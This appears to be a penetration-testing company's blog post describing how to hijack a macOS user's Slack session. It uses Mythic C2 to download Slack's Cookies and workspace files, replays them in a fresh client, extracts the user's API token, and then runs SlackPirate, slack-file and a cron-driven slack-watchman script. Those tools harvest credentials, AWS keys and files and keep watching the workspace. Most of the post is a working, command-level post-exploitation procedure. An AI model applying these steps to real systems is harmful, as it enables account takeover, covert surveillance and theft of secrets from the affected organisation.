Let’s face it, Slack is a treasure trove of information for hackers. Credentials. Proprietary data. Social engineering opportunities. You get the picture – it’s an information-rich environment.

I’m going to dig into Slack workspace compromise to provide additional information and tooling you can use to leverage access. This guidance will build off of “Abusing Slack for Offensive Operations”, a great article Cody Thomas wrote for the SpectreOps blog.

In his article, Cody describes a still-working method for hijacking a user’s slack session using low-privileged access to a macOS local file system. We’re going to take it a bit further.

Getting Started

All TTP’s described are dependent on the fact that the operator has a command and control session with a macOS machine. We will work through the following:

  • Use of Mythic C2 for session extraction

  • Setting up access for this compromised session

  • Leveraging your access with tooling

Mythic C2

Mythic C2 is the best command-and-control framework for macOS (and probably a close second to other paid C2s out there) on the market. Let’s say we have a shell on a user’s workstation, achieved through Mythic Poseidon payload execution.

Mythic C2 Command

With this, let’s check if the user has Slack installed. A quick way to do this if you don’t want to browse around the filesystem is to use this command:

system_profiler SPApplicationsDataType | grep -i slack

In Mythic, execute this using the command window for your target session:

Mythic execute

If valid, Mythic will return output similar to what is shown below: Mythic output

Now that we know Slack is installed, we want to quickly grab two files directly related to our compromised user’s session. For this, we’ll use the download command provided by our agent. The files we need will be in one of two places. In my experience, the files almost always are available in this directory:

~/Library/Application Support/Slack/

If it’s not there, check:

~/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack

Use the following commands in Mythic to download our needed files – assuming everything is in the first path mentioned above:

download "~/Library/Application Support/Slack/storage/slack-workspaces"
download "~/Library/Application\ Support/Slack/Cookies"

You should see something similar to what is shown below in Mythic following a successful download:

Mythic output
Once you have those files, we can set up our actual Slack client, where we’ll impersonate our user.

Setup

I won’t dwell too long on this, as the setup is pretty straightforward. All you need is a never-before used install of Slack on macOS.

I recommend you do this on a macOS virtual machine. Once you have an environment prepared, copy your stolen files into the VM and do the following:

  1. Launch Slack for the first time and then close it completely

  2. Execute similar commands to the ones below to copy everything to where it needs to be

    cp slack-workspaces "~/Library/Application Support/Slack/storage/slack-workspaces"
    cp Cookies "~/Library/Application\ Support/Slack/Cookies" 
    rm "~/Library/Application\ Support/Slack/storage/root-state.json"
  3. Launch the Slack application

You should now have an active session ready to go for your post-exploitation efforts.

Post Exploitation

Here is where we get into some stuff not covered in Cody’s article. I want to showcase some tooling and methodology I’ve used on recent engagements to leverage our stolen session.

Before we do anything, an interesting aspect of this attack is the fact that we’re not only able to access the user’s Slack workspace but also extract the user’s API token. These tokens are generally prefaced by xox or xoxs. From the Slack client, navigate to the following menu item shown below and click.

Mythic output

After clicking “customize,” a browser window will open with a session for your impersonated user. From here, you can grab the user’s API token needed for most tools detailed below. To get the token, do this:

  1. In Chrome, click the “three dots” in the upper right-hand corner.

  2. Click on “More Tools” -> “Developer Tools”.

  3. Select “network” and “headers” views in right-side pane of developer tools.

  4. While logged into Slack, visit https://.slack.com/customize/emoji

  5. Click on info and scroll down to grab your token: Mythic output

  6. Save the token for later

Tooling

SlackPirate

Now that we have our token, we can do some fun stuff. One classic piece of tooling for workspace enumeration is SlackPirate:

emtunc/SlackPirate This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token. As of May 2018, Slack has over 8 million

https://github.com/emtunc/SlackPirate

SlackPirate is nuts. It lets us extract the following out of the box:

  • Print to standard output the domains (if any) allowed to register for the Workspace. I’ve seen stale, old and forgotten domains here that can be purchased and used to register for the Workspace.

  • Links to S3 buckets

  • Passwords

  • AWS access/secret keys

  • Private keys

  • Pinned messages across all channels

  • References to links and URLs that could provide further access to sensitive materials - Google Docs, Trello Invites, links to internal systems, etc.

  • Files that could contain sensitive information such as .key, .sh, the words “password” or “secret” embedded in a document, etc.

For example, we can use the following command to extract all possible credentials from the workspace:

python3 SlackPirate.py --token xoxs-3444921100-[REDACTED] --credential-scan

SlackPirate uses the following regular expressions to search for possible credentials:

CREDENTIALS_REGEX = r"(?i)(" \
                    r"password\s*[`=:\"]+\s*[^\s]+|" \
                    r"password is\s*[`=:\"]*\s*[^\s]+|" \
                    r"pwd\s*[`=:\"]*\s*[^\s]+|" \
                    r"passwd\s*[`=:\"]+\s*[^\s]+)"

You can of course easily add more to meet your needs. You can additionally modify all regular expressions for each search to meet the needs of your engagement. I usually roll with the following parameters:

--team-access-logs --user-list --pinned-message-scan --aws-key-scan --private-key-scan --link-scan


slack-file

To download files from a workspace, I really like the tool linked below:

tmyymmt/slack-file Show slack file list, download slack files, delete slack files by channel and period of time. Table of Contents Require Golang environment and setup GOPATH. $ go get

https://github.com/tmyymmt/slack-file

This is a slick little tool written in golang that lets you download files from a workspace. Once installed, you can execute the command below:

slack-file  --download --to-with-date --to-with-channels --type=all --token xoxs-3444921100-[REDACTED]

This will download all files from a workspace with corresponding dates and channel IDs. You can also change the --type= flag to only download Microsoft Word documents, for example.

slack-watchman

An interesting part of this attack path is that once you hijack a user’s session, it appears to be available to the attacker for an indefinite amount of time. Therefore, we can easily build something to watch our target workspace for sensitive data. This is useful for:

  • Defenders

  • Continuous penetration testing

  • Long-term Red Team engagements

The tool slack-watchman will help you achieve this:

PaperMtn/slack-watchman Monitoring your Slack workspaces for sensitive information Slack Watchman is an application that uses the Slack API to look for potentially sensitive data exposed in your Slack workspaces.

https://github.com/PaperMtn/slack-watchman

This tool has a premade set of YAML files used to detect sensitive information. This can easily be expanded upon to meet the needs of your engagement. The one downside to this tooling is that there is no way of knowing when sensitive data is published to the workspace without checking the resulting logfile manually.

Let’s set up notifications and a cronjob to tell us about sensitive information posted to a workspace within the last 24 hours. Here’s how:

  1. Install slack-watchman using pip

    pip install slack-watchman
  2. Setup your slack-watchman config file in your home folder with the name, watchman.conf:

    slack_watchman:
        token: xoxs-3444921100-891374457668-1593787740740-REDACTED

    You’ll need to update the above values to match your user’s token and desired log output path. The token is the one we grabbed earlier.

  3. Write a simple Bash script.

    #!/bin/bash
    
    log="slack_watchman.log"
    slack_webhook="<URL>"
    slack-watchman --timeframe w --pii --financial --tokens --files --output file
    changed=$(find "$log" -mmin -60 -type f -print)
    
    if [ "$changed" = "$log" ]; then
       curl -X POST -H 'Content-type: application/json' \
       --data '{"text":"We found something new!"}' "$slack_webhook"
    fi

    Modify the script above to contain your log file location and Slack Webhook URL. Additionally, modify the slack-watchman command to meet your needs.

  4. Setup a cronjob

    0 5 1 * * /bin/bash ~/slackwatch.sh >/dev/null 2>&1


Again, modify the cronjob to meet your needs and to reflect your script’s location and name.

This solution is far from plug-and-play. Some definite improvements can be made here, such as:

  • In the notification, include what changed

  • Doing larger scans for widened time periods

  • Custom/additional detections

Final Thoughts

Accessing an organization’s Slack workspace is significant. With continuous penetration testing, we amplify the impact tenfold by continuously monitoring Slack workspaces for sensitive information.

If you want to understand the role continuous penetration testing plays – and why it’s relevant for exposing critical information disclosure such as this, send us a note any time.



We’re here, first and foremost, to help you find the right solution for your network security testing needs. That means when you request a quote, we deliver what you ask for – all without marketing nonsense, over-aggressive salespeople or annoying spam emails.




About the Author

Nicholas Anastasi, penetration tester

As an Offensive Security Certified Professional (OSCP), Nicholas is focused on pushing the boundaries of clients’ networks, ensuring they are protected against the latest attacks and vulnerabilities. He joined Sprocket in early 2019 and has a particular interest in cloud technologies and DevOps. Email him at nanastasi@sprocketsecurity.com